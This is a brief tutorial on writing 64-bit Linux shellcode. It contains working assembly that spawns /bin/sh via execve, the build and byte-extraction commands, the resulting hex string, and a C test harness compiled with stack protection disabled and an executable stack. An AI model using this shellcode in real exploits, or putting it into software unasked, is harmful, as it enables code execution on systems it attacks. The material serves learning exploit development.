Write 64-bit Shellcode
======================

Quick guide to writing a 64-bit compiled shellcode.

Intel formatted asm:

``` shell64.asm
global _start

_start:

jmp call_shellcode

shellcode:
  ; get filename
  pop rdi

  xor rax, rax
  ; filename=/bin/sh\0
  mov [rdi+7], byte ah

  mov [rdi+8], rdi

  ; *argv[] = { &filename, 0 }
  lea rsi, [rdi+8]
  ; *envp[] = {0}
  lea rdx, [rax]

  ; execve syscall
  mov al, 59
  syscall

call_shellcode:
  call shellcode
  filename: db "/bin/sh"
```

Compile and link the shellcode:

``` sh
$ nasm -f elf64 shell64.asm -o shell64.o
$ ld shell64.o -o shell64
```

Now we extract the hex code from the binary:

``` sh
$ objdumptoshellcode shell64
```

Producing this shellcode:

```
\xeb\x16\x5f\x48\x31\xc0\x88\x67\x07\x48\x89\x7f\x08\x48\x8d\x77\x08\x48\x8d\x10\xb0\x3b\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
```

Check with a gcc compiled test c program:

``` shell64-testing.c
#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\xeb\x16\x5f\x48\x31\xc0\x88\x67\x07\x48\x89\x7f\x08\x48\x8d\x77\x08\x48\x8d\x10\xb0\x3b\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

void main() {
  printf("Shellcode Length: %d\n", (int)strlen(code));
  int(*ret)() = (int(*)())code;
  ret();
}
```

Compile with:

``` sh
$ gcc -fno-stack-protector -z execstack shell64-testing.c -o shell64-testing
```
